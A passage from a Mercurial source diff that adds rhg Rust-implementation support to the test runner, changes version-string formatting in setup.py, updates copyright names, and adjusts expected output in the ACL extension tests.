- .expect("rev should be a required argument");
- let kind = match (
- args.is_present("changelog"),
- args.is_present("manifest"),
- ) {
- (true, false) => DebugDataKind::Changelog,
- (false, true) => DebugDataKind::Manifest,
- (true, true) => {
- unreachable!("Should not happen since options are exclusive")
- }
- (false, false) => {
- unreachable!("Should not happen since options are required")
- }
- };
- Ok(commands::debugdata::DebugDataCommand::new(rev, kind))
+ if let Some(ignored_list) =
+ config.get_simple_list(b"rhg", b"ignored-extensions")
+ {
+ for ignored in ignored_list {
+ unsupported.remove(ignored);
+ }
+ }
+
+ if unsupported.is_empty() {
+ Ok(())
+ } else {
+ Err(CommandError::UnsupportedFeature {
+ message: format_bytes!(
+ b"extensions: {} (consider adding them to 'rhg.ignored-extensions' config)",
+ join(unsupported, b", ")
+ ),
+ })
}
}
--- a/rust/rhg/src/ui.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/ui.rs Tue Apr 20 11:01:06 2021 -0400
@@ -49,11 +49,6 @@
stderr.flush().or_else(handle_stderr_error)
}
-
- /// Write string line to stderr
- pub fn writeln_stderr_str(&self, s: &str) -> Result<(), UiError> {
- self.write_stderr(&format!("{}\n", s).as_bytes())
- }
}
/// A buffered stdout writer for faster batch printing operations.
--- a/setup.py Thu Mar 25 19:06:28 2021 -0400
+++ b/setup.py Tue Apr 20 11:01:06 2021 -0400
@@ -419,9 +419,9 @@
ltag = sysstr(hg.run(ltagcmd))
changessincecmd = ['log', '-T', 'x\n', '-r', "only(.,'%s')" % ltag]
changessince = len(hg.run(changessincecmd).splitlines())
- version = '%s+%s-%s' % (ltag, changessince, hgid)
+ version = '%s+hg%s.%s' % (ltag, changessince, hgid)
if version.endswith('+'):
- version += time.strftime('%Y%m%d')
+ version = version[:-1] + 'local' + time.strftime('%Y%m%d')
elif os.path.exists('.hg_archival.txt'):
kw = dict(
[[t.strip() for t in l.split(':', 1)] for l in open('.hg_archival.txt')]
@@ -430,11 +430,13 @@
version = kw['tag']
elif 'latesttag' in kw:
if 'changessincelatesttag' in kw:
- version = '%(latesttag)s+%(changessincelatesttag)s-%(node).12s' % kw
+ version = (
+ '%(latesttag)s+hg%(changessincelatesttag)s.%(node).12s' % kw
+ )
else:
- version = '%(latesttag)s+%(latesttagdistance)s-%(node).12s' % kw
+ version = '%(latesttag)s+hg%(latesttagdistance)s.%(node).12s' % kw
else:
- version = kw.get('node', '')[:12]
+ version = '0+hg' + kw.get('node', '')[:12]
if version:
versionb = version
@@ -451,20 +453,6 @@
),
)
-try:
- oldpolicy = os.environ.get('HGMODULEPOLICY', None)
- os.environ['HGMODULEPOLICY'] = 'py'
- from mercurial import __version__
-
- version = __version__.version
-except ImportError:
- version = b'unknown'
-finally:
- if oldpolicy is None:
- del os.environ['HGMODULEPOLICY']
- else:
- os.environ['HGMODULEPOLICY'] = oldpolicy
-
class hgbuild(build):
# Insert hgbuildmo first so that files in mercurial/locale/ are found
@@ -609,6 +597,12 @@
# and its build is not explictely disabled (for external build
# as Linux distributions would do)
if self.distribution.rust and self.rust:
+ if not sys.platform.startswith('linux'):
+ self.warn(
+ "rust extensions have only been tested on Linux "
+ "and may not behave correctly on other platforms"
+ )
+
for rustext in ruststandalones:
rustext.build('' if self.inplace else self.build_lib)
@@ -823,6 +817,22 @@
if not os.path.exists(dest):
shutil.copy(buf.value, dest)
+ # Also overwrite python3.dll so that hgext.git is usable.
+ # TODO: also handle the MSYS flavor
+ if sys.version_info[0] >= 3:
+ python_x = os.path.join(
+ os.path.dirname(fsdecode(buf.value)),
+ "python3.dll",
+ )
+
+ if os.path.exists(python_x):
+ dest = os.path.join(
+ os.path.dirname(self.hgtarget),
+ os.path.basename(python_x),
+ )
+
+ shutil.copy(python_x, dest)
+
if not pythonlib:
log.warn(
'could not determine Python DLL filename; assuming pythonXY'
@@ -1677,8 +1687,8 @@
# unicode on Python 2 still works because it won't contain any
# non-ascii bytes and will be implicitly converted back to bytes
# when operated on.
-assert isinstance(version, bytes)
-setupversion = version.decode('ascii')
+assert isinstance(version, str)
+setupversion = version
extra = {}
@@ -1706,7 +1716,7 @@
extra['console'] = [
{
'script': 'hg',
- 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others',
+ 'copyright': 'Copyright (C) 2005-2021 Olivia Mackall and others',
'product_version': version,
}
]
@@ -1782,7 +1792,7 @@
setup(
name='mercurial',
version=setupversion,
- author='Matt Mackall and many others',
+ author='Olivia Mackall and many others',
author_email='mercurial@mercurial-scm.org',
url='https://mercurial-scm.org/',
download_url='https://mercurial-scm.org/release/',
--- a/tests/common-pattern.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/common-pattern.py Tue Apr 20 11:01:06 2021 -0400
@@ -20,7 +20,6 @@
br'phases%253Dheads%250A'
br'pushkey%250A'
br'remote-changegroup%253Dhttp%252Chttps%250A'
- br'rev-branch-cache%250A'
br'stream%253Dv2',
# (the replacement patterns)
br'$USUAL_BUNDLE_CAPS$',
@@ -53,7 +52,6 @@
br'phases%3Dheads%0A'
br'pushkey%0A'
br'remote-changegroup%3Dhttp%2Chttps%0A'
- br'rev-branch-cache%0A'
br'stream%3Dv2',
# (replacement patterns)
br'$USUAL_BUNDLE2_CAPS$',
@@ -70,8 +68,7 @@
br'listkeys%0A'
br'phases%3Dheads%0A'
br'pushkey%0A'
- br'remote-changegroup%3Dhttp%2Chttps%0A'
- br'rev-branch-cache',
+ br'remote-changegroup%3Dhttp%2Chttps',
# (replacement patterns)
br'$USUAL_BUNDLE2_CAPS_SERVER$',
),
@@ -85,7 +82,6 @@
br'listkeys%0A'
br'pushkey%0A'
br'remote-changegroup%3Dhttp%2Chttps%0A'
- br'rev-branch-cache%0A'
br'stream%3Dv2',
# (replacement patterns)
br'$USUAL_BUNDLE2_CAPS_NO_PHASES$',
--- a/tests/flagprocessorext.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/flagprocessorext.py Tue Apr 20 11:01:06 2021 -0400
@@ -31,28 +31,28 @@
return False
-def noopdonothing(self, text, sidedata):
+def noopdonothing(self, text):
return (text, True)
def noopdonothingread(self, text):
- return (text, True, {})
+ return (text, True)
-def b64encode(self, text, sidedata):
+def b64encode(self, text):
return (base64.b64encode(text), False)
def b64decode(self, text):
- return (base64.b64decode(text), True, {})
+ return (base64.b64decode(text), True)
-def gzipcompress(self, text, sidedata):
+def gzipcompress(self, text):
return (zlib.compress(text), False)
def gzipdecompress(self, text):
- return (zlib.decompress(text), True, {})
+ return (zlib.decompress(text), True)
def supportedoutgoingversions(orig, repo):
--- a/tests/hghave.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/hghave.py Tue Apr 20 11:01:06 2021 -0400
@@ -140,9 +140,22 @@
"""Return the match object if cmd executes successfully and its output
is matched by the supplied regular expression.
"""
+
+ # Tests on Windows have to fake USERPROFILE to point to the test area so
+ # that `~` is properly expanded on py3.8+. However, some tools like black
+ # make calls that need the real USERPROFILE in order to run `foo --version`.
+ env = os.environ
+ if os.name == 'nt':
+ env = os.environ.copy()
+ env['USERPROFILE'] = env['REALUSERPROFILE']
+
r = re.compile(regexp)
p = subprocess.Popen(
- cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
+ cmd,
+ shell=True,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.STDOUT,
+ env=env,
)
s = p.communicate()[0]
ret = p.returncode
@@ -188,6 +201,11 @@
return 'CHGHG' in os.environ
+@check("rhg", "running with rhg as 'hg'")
+def has_rhg():
+ return 'RHG_INSTALLED_AS_HG' in os.environ
+
+
@check("cvs", "cvs client/server")
def has_cvs():
re = br'Concurrent Versions System.*?server'
@@ -591,7 +609,7 @@
return matchoutput("pylint --help", br"Usage:[ ]+pylint", True)
-@check("clang-format", "clang-format C code formatter")
+@check("clang-format", "clang-format C code formatter (>= 11)")
def has_clang_format():
m = matchoutput('clang-format --version', br'clang-format version (\d+)')
# style changed somewhere between 10.x and 11.x
@@ -702,6 +720,12 @@
return os.path.isdir(os.path.join(t, "..", ".hg"))
+@check("network-io", "whether tests are allowed to access 3rd party services")
+def has_test_repo():
+ t = os.environ.get("HGTESTS_ALLOW_NETIO")
+ return t == "1"
+
+
@check("curses", "terminfo compiler and curses module")
def has_curses():
try:
@@ -1034,7 +1058,7 @@
return matchoutput('sqlite3 -version', br'^3\.\d+')
-@check('vcr', 'vcr http mocking library')
+@check('vcr', 'vcr http mocking library (pytest-vcr)')
def has_vcr():
try:
import vcr
@@ -1054,7 +1078,7 @@
return matchoutput('emacs --version', b'GNU Emacs 2(4.4|4.5|5|6|7|8|9)')
-@check('black', 'the black formatter for python')
+@check('black', 'the black formatter for python (>= 20.8b1)')
def has_black():
blackcmd = 'black --version'
version_regex = b'black, version ([0-9a-b.]+)'
--- a/tests/logexceptions.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/logexceptions.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# logexceptions.py - Write files containing info about Mercurial exceptions
#
-# Copyright 2017 Matt Mackall <mpm@selenic.com>
+# Copyright 2017 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/tests/remotefilelog-getflogheads.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/remotefilelog-getflogheads.py Tue Apr 20 11:01:06 2021 -0400
@@ -5,6 +5,9 @@
hg,
registrar,
)
+from mercurial.utils import (
+ urlutil,
+)
cmdtable = {}
command = registrar.command(cmdtable)
@@ -18,10 +21,13 @@
Used for testing purpose
"""
- dest = repo.ui.expandpath(b'default')
+ dest = urlutil.get_unique_pull_path(b'getflogheads', repo, ui)[0]
peer = hg.peer(repo, {}, dest)
- flogheads = peer.x_rfl_getflogheads(path)
+ try:
+ flogheads = peer.x_rfl_getflogheads(path)
+ finally:
+ peer.close()
if flogheads:
for head in flogheads:
--- a/tests/run-tests.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/run-tests.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# run-tests.py - Run a set of tests on Mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -301,6 +301,7 @@
while time.time() - start < timeout and p.returncode is None:
time.sleep(0.1)
p.timeout = True
+ vlog('# Timout reached for process %d' % p.pid)
if p.returncode is None:
terminate(p)
@@ -540,6 +541,11 @@
action="store_true",
help="show chg debug logs",
)
+ hgconf.add_argument(
+ "--rhg",
+ action="store_true",
+ help="install and use rhg Rust implementation in place of hg",
+ )
hgconf.add_argument("--compiler", help="compiler to build with")
hgconf.add_argument(
'--extra-config-opt',
@@ -552,6 +558,7 @@
"--local",
action="store_true",
help="shortcut for --with-hg=<testdir>/../hg, "
+ "--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, "
"and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
)
hgconf.add_argument(
@@ -580,6 +587,11 @@
help="use specified chg wrapper in place of hg",
)
hgconf.add_argument(
+ "--with-rhg",
+ metavar="RHG",
+ help="use specified rhg Rust implementation in place of hg",
+ )
+ hgconf.add_argument(
"--with-hg",
metavar="HG",
help="test using specified hg script rather than a "
@@ -667,13 +679,17 @@
parser.error('--rust cannot be used with --no-rust')
if options.local:
- if options.with_hg or options.with_chg:
- parser.error('--local cannot be used with --with-hg or --with-chg')
+ if options.with_hg or options.with_rhg or options.with_chg:
+ parser.error(
+ '--local cannot be used with --with-hg or --with-rhg or --with-chg'
+ )
testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
reporootdir = os.path.dirname(testdir)
pathandattrs = [(b'hg', 'with_hg')]
if options.chg:
pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
+ if options.rhg:
+ pathandattrs.append((b'rust/target/release/rhg', 'with_rhg'))
for relpath, attr in pathandattrs:
binpath = os.path.join(reporootdir, relpath)
if os.name != 'nt' and not os.access(binpath, os.X_OK):
@@ -696,6 +712,8 @@
if (options.chg or options.with_chg) and os.name == 'nt':
parser.error('chg does not work on %s' % os.name)
+ if (options.rhg or options.with_rhg) and os.name == 'nt':
+ parser.error('rhg does not work on %s' % os.name)
if options.with_chg:
options.chg = False # no installation to temporary location
options.with_chg = canonpath(_sys2bytes(options.with_chg))
@@ -704,12 +722,28 @@
and os.access(options.with_chg, os.X_OK)
):
parser.error('--with-chg must specify a chg executable')
+ if options.with_rhg:
+ options.rhg = False # no installation to temporary location
+ options.with_rhg = canonpath(_sys2bytes(options.with_rhg))
+ if not (
+ os.path.isfile(options.with_rhg)
+ and os.access(options.with_rhg, os.X_OK)
+ ):
+ parser.error('--with-rhg must specify a rhg executable')
if options.chg and options.with_hg:
# chg shares installation location with hg
parser.error(
'--chg does not work when --with-hg is specified '
'(use --with-chg instead)'
)
+ if options.rhg and options.with_hg:
+ # rhg shares installation location with hg
+ parser.error(
+ '--rhg does not work when --with-hg is specified '
+ '(use --with-rhg instead)'
+ )
+ if options.rhg and options.chg:
+ parser.error('--rhg and --chg do not work together')
if options.color == 'always' and not pygmentspresent:
sys.stderr.write(
@@ -1338,6 +1372,7 @@
env['TESTNAME'] = self.name
env['HOME'] = _bytes2sys(self._testtmp)
if os.name == 'nt':
+ env['REALUSERPROFILE'] = env['USERPROFILE']
# py3.8+ ignores HOME: https://bugs.python.org/issue36264
env['USERPROFILE'] = env['HOME']
formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1])
@@ -2278,7 +2313,7 @@
if test.path.endswith(b'.t'):
rename(test.errpath, test.path)
else:
- rename(test.errpath, '%s.out' % test.path)
+ rename(test.errpath, b'%s.out' % test.path)
accepted = True
if not accepted:
self.faildata[test.name] = b''.join(lines)
@@ -3098,6 +3133,25 @@
chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
self._hgcommand = os.path.basename(self.options.with_chg)
+ # configure fallback and replace "hg" command by "rhg"
+ rhgbindir = self._bindir
+ if self.options.rhg or self.options.with_rhg:
+ # Affects hghave.py
+ osenvironb[b'RHG_INSTALLED_AS_HG'] = b'1'
+ # Affects configuration. Alternatives would be setting configuration through
+ # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include
+ # `--config` but that disrupts tests that print command lines and check expected
+ # output.
+ osenvironb[b'RHG_ON_UNSUPPORTED'] = b'fallback'
+ osenvironb[b'RHG_FALLBACK_EXECUTABLE'] = os.path.join(
+ self._bindir, self._hgcommand
+ )
+ if self.options.rhg:
+ self._hgcommand = b'rhg'
+ elif self.options.with_rhg:
+ rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg))
+ self._hgcommand = os.path.basename(self.options.with_rhg)
+
osenvironb[b"BINDIR"] = self._bindir
osenvironb[b"PYTHON"] = PYTHON
@@ -3116,6 +3170,8 @@
path.insert(2, realdir)
if chgbindir != self._bindir:
path.insert(1, chgbindir)
+ if rhgbindir != self._bindir:
+ path.insert(1, rhgbindir)
if self._testdir != runtestdir:
path = [self._testdir] + path
if self._tmpbindir != self._bindir:
@@ -3335,6 +3391,9 @@
if self.options.chg:
assert self._installdir
self._installchg()
+ if self.options.rhg:
+ assert self._installdir
+ self._installrhg()
log(
'running %d tests using %d parallel processes'
@@ -3696,6 +3755,33 @@
sys.stdout.write(out)
sys.exit(1)
+ def _installrhg(self):
+ """Install rhg into the test environment"""
+ vlog('# Performing temporary installation of rhg')
+ assert os.path.dirname(self._bindir) == self._installdir
+ assert self._hgroot, 'must be called after _installhg()'
+ cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % {
+ b'make': b'make', # TODO: switch by option or environment?
+ b'prefix': self._installdir,
+ }
+ cwd = self._hgroot
+ vlog("# Running", cmd)
+ proc = subprocess.Popen(
+ cmd,
+ shell=True,
+ cwd=cwd,
+ stdin=subprocess.PIPE,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.STDOUT,
+ )
+ out, _err = proc.communicate()
+ if proc.returncode != 0:
+ if PYTHON3:
+ sys.stdout.buffer.write(out)
+ else:
+ sys.stdout.write(out)
+ sys.exit(1)
+
def _outputcoverage(self):
"""Produce code coverage output."""
import coverage
--- a/tests/simplestorerepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/simplestorerepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -106,7 +106,9 @@
_flagserrorclass = simplestoreerror
- def __init__(self, svfs, path):
+ def __init__(self, repo, svfs, path):
+ self.nullid = repo.nullid
+ self._repo = repo
self._svfs = svfs
self._path = path
@@ -300,7 +302,7 @@
text = rawtext
else:
r = flagutil.processflagsread(self, rawtext, flags)
- text, validatehash, sidedata = r
+ text, validatehash = r
if validatehash:
self.checkhash(text, node, rev=rev)
@@ -446,6 +448,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
# TODO this will probably break on some ordering options.
nodes = [n for n in nodes if n != nullid]
@@ -459,6 +462,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
):
yield delta
@@ -550,7 +554,7 @@
if node in self._indexbynode:
if duplicaterevisioncb:
- duplicaterevisioncb(self, node)
+ duplicaterevisioncb(self, self.rev(node))
empty = False
continue
@@ -560,12 +564,12 @@
else:
text = mdiff.patch(self.revision(deltabase), delta)
- self._addrawrevision(
+ rev = self._addrawrevision(
node, text, transaction, linkrev, p1, p2, flags
)
if addrevisioncb:
- addrevisioncb(self, node)
+ addrevisioncb(self, rev)
empty = False
return not empty
@@ -687,7 +691,7 @@
class simplestorerepo(repo.__class__):
def file(self, f):
- return filestorage(self.svfs, f)
+ return filestorage(repo, self.svfs, f)
repo.__class__ = simplestorerepo
--- a/tests/svnxml.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/svnxml.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,6 +15,7 @@
e['revision'] = entry.getAttribute('revision')
e['author'] = xmltext(entry.getElementsByTagName('author')[0])
e['msg'] = xmltext(entry.getElementsByTagName('msg')[0])
+ e['date'] = xmltext(entry.getElementsByTagName('date')[0])
e['paths'] = []
paths = entry.getElementsByTagName('paths')
if paths:
@@ -42,7 +43,7 @@
except AttributeError:
fp = sys.stdout
for e in entries:
- for k in ('revision', 'author', 'msg'):
+ for k in ('revision', 'author', 'date', 'msg'):
fp.write(('%s: %s\n' % (k, e[k])).encode('utf-8'))
for path, action, fpath, frev in sorted(e['paths']):
frominfo = b''
--- a/tests/test-acl.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-acl.t Tue Apr 20 11:01:06 2021 -0400
@@ -109,14 +109,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -175,14 +175,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -204,6 +204,7 @@
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 5 parts total
+ truncating cache/rbc-revs-v1 to 8
updating the branch cache
added 3 changesets with 3 changes to 3 files
bundle2-output-bundle: "HG20", 1 parts total
@@ -244,14 +245,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -283,6 +284,7 @@
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 5 parts total
+ truncating cache/rbc-revs-v1 to 8
updating the branch cache
added 3 changesets with 3 changes to 3 files
bundle2-output-bundle: "HG20", 1 parts total
@@ -323,14 +325,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -359,6 +361,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" not allowed on "foo/file.txt" (changeset "ef1ea85a6374")
no rollback information available
0:6675d58eff77
@@ -393,14 +396,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -468,14 +471,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -540,14 +543,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -617,14 +620,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -691,14 +694,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -764,7 +767,7 @@
list of changesets:
ef1ea85a6374b77d6da9dcda9541f498f2d17df7
bundle2-output-bundle: "HG20", 7 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:bookmarks" 37 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
@@ -773,7 +776,7 @@
bundle2-output-part: "bookmarks" 37 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:bookmarks" supported
bundle2-input-part: total payload size 37
bundle2-input-part: "check:phases" supported
@@ -853,7 +856,7 @@
list of changesets:
ef1ea85a6374b77d6da9dcda9541f498f2d17df7
bundle2-output-bundle: "HG20", 7 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:bookmarks" 37 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
@@ -862,7 +865,7 @@
bundle2-output-part: "bookmarks" 37 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:bookmarks" supported
bundle2-input-part: total payload size 37
bundle2-input-part: "check:phases" supported
@@ -897,6 +900,7 @@
bundle2-input-bundle: 7 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" denied on bookmark "moving-bookmark" (changeset "ef1ea85a6374b77d6da9dcda9541f498f2d17df7")
no rollback information available
0:6675d58eff77
@@ -943,14 +947,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1029,14 +1033,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1069,6 +1073,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "wilma" not allowed on "quux/file.py" (changeset "911600dab2ae")
no rollback information available
0:6675d58eff77
